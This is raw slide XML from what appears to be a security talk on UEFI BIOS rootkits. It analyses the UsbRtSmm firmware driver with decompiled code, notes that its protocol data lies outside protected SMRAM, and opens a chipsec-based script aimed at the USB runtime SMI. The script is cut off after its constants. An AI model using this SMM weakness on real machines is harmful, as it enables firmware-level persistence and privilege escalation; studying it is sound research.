              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Shape 584"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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590" name="Shape 590"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Shape 591"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647150" y="1521900"/>
            <a:ext cx="10907700" cy="495600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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( (gEfiBootServices_4-&gt;LocateProtocol(&amp;EFI_USB_PROTOCOL_GUID, 0i64, &amp;EfiUsbProtocol) &amp; 0x8000000000000000ui64) == 0i64 )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	qword_BD48B460 = *(EfiUsbProtocol + 8);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(EfiUsbProtocol + 0x50) = sub_BD4759E8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(EfiUsbProtocol + 0x58) = sub_BD475CCC;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(EfiUsbProtocol + 0x60) = sub_BD475D74;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The ptr (let us call it usb_data now) is stored in the EFI_USB_PROTOCOL protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Shape 592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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294" name="Shape 294"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501640" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2300" lvl="0" marL="396000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Intro. UEFI BIOS rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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598" name="Shape 598"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Shape 599"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638099" y="1567182"/>
            <a:ext cx="9682200" cy="495612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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>LODWORD(usb_protocol) = sub_6088(0x90i64, 0x10i64);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 8) = usb_data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>qword_CB58 = usb_protocol;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 16) = sub_30B4; *(_DWORD *)usb_protocol = ‘PBSU’;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 24) = sub_2E40;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 32) = sub_2FC8;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 40) = sub_350C;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 48) = sub_3524;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 56) = sub_3524;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 64) = sub_3524;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 72) = sub_6448;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 104) = sub_31F8;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 112) = sub_63AC;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(_QWORD *)(usb_protocol + 120) = sub_3238; gEfiBootServices_0-&gt;InstallProtocolInterface(&amp;v25, &amp;EFI_USB_PROTOCOL_GUID, 0, (void *)usb_ protocol);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Shape 600"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 601"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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606" name="Shape 606"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Shape 607"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638100" y="1567175"/>
            <a:ext cx="11124300" cy="495600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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gEfiBootServices_0-&gt;AllocatePages(AllocateMaxAddress, EfiRuntimeServicesData, 0x11ui64, &amp;Memory);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFE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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>The memory of the EfiRuntimeServicesData type is allocated for the structure, which means that the structure is out of the SMRAM region!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Shape 609"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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614" name="Shape 614"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Shape 615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638100" y="1567175"/>
            <a:ext cx="11124300" cy="495600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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from struct import pack, unpack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>import chipsec.chipset</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from chipsec.hal.interrupts import Interrupts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PAGE_SIZE = 0x1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SMI_USB_RUNTIME = 0x31</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
